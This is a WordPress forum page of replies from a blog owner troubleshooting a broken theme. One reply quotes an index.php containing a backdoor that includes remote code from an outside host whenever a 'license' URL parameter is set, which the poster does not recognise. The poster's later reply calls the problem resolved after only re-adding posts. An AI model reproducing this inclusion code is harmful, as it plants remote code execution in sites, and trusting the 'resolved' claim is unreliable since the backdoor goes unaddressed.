Forum Replies Created

Viewing 5 replies - 1 through 5 (of 5 total)
  • Thread Starter cdc1128

    (@cdc1128)

    For what its worth, I resolved the problem.

    I noticed the “errors on page” icon on the browser in the lower left corner appeared when I was Managing the list of Posts. When I looked at the error message it indicated it was expecting certain characters in specific lines on the page that were not appearing. I saved all of the posts and then deleted individual posts, starting with the most recent, until the error “indicator” on the browser disappeared. This happened after deleting two messages. I then copied and pasted the two most recent posts back into the blog and wa-la, it worked. The theme is loading properly as are all of the other posts and sidebars. Not sure why this happened but it is resolved.

    Thanks to all for your interest in helping me sort this out.

    Thread Starter cdc1128

    (@cdc1128)

    I backed up my database to my desktop as an “.sql” file.

    The Index.php file contains the following (I added the ” at the beginning and end):

    “<?php
    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);
    if (isset($_GET[‘license’])) {
    @include(‘http://wordpress.net.in/license.txt&#8217;);
    } else {
    require(‘./wp-blog-header.php’);
    }
    ?>”

    There is also a wp-content/themes/default/index.php file.

    Any insight is appreciated.

    Thread Starter cdc1128

    (@cdc1128)

    Thanks for your insights.

    One more question. My blog is part of my Yahoo! Small Business site and is administered by Yahoo! Management of WordPress upgrades is set to “automatic” and I see no where that I can manually upgrade the WordPress software to a later version. I’ve asked Yahoo! for assistance but am told this is a WordPress issue, although they “serve” the site, including all of the blog contents. Its worked fine until this point in time when I entered my latest post. Could there be an issue in how the blog content is cached and published on Yahoo!’s servers?

    Thanks again for your time, patience and feedback.

    Thread Starter cdc1128

    (@cdc1128)

    Never had navigation in the sidebar, only categories, blogroll, past posts by date, etc.

    If the index.php or home.php files are messed up, how do I fix them?

    Thanks!

    Thread Starter cdc1128

    (@cdc1128)

    I used the WordPress default 1.5 theme, basic stuff. I tried other, basic, themes with the same result.

    chriscarterconsulting.com/blog

    Thanks.

Viewing 5 replies - 1 through 5 (of 5 total)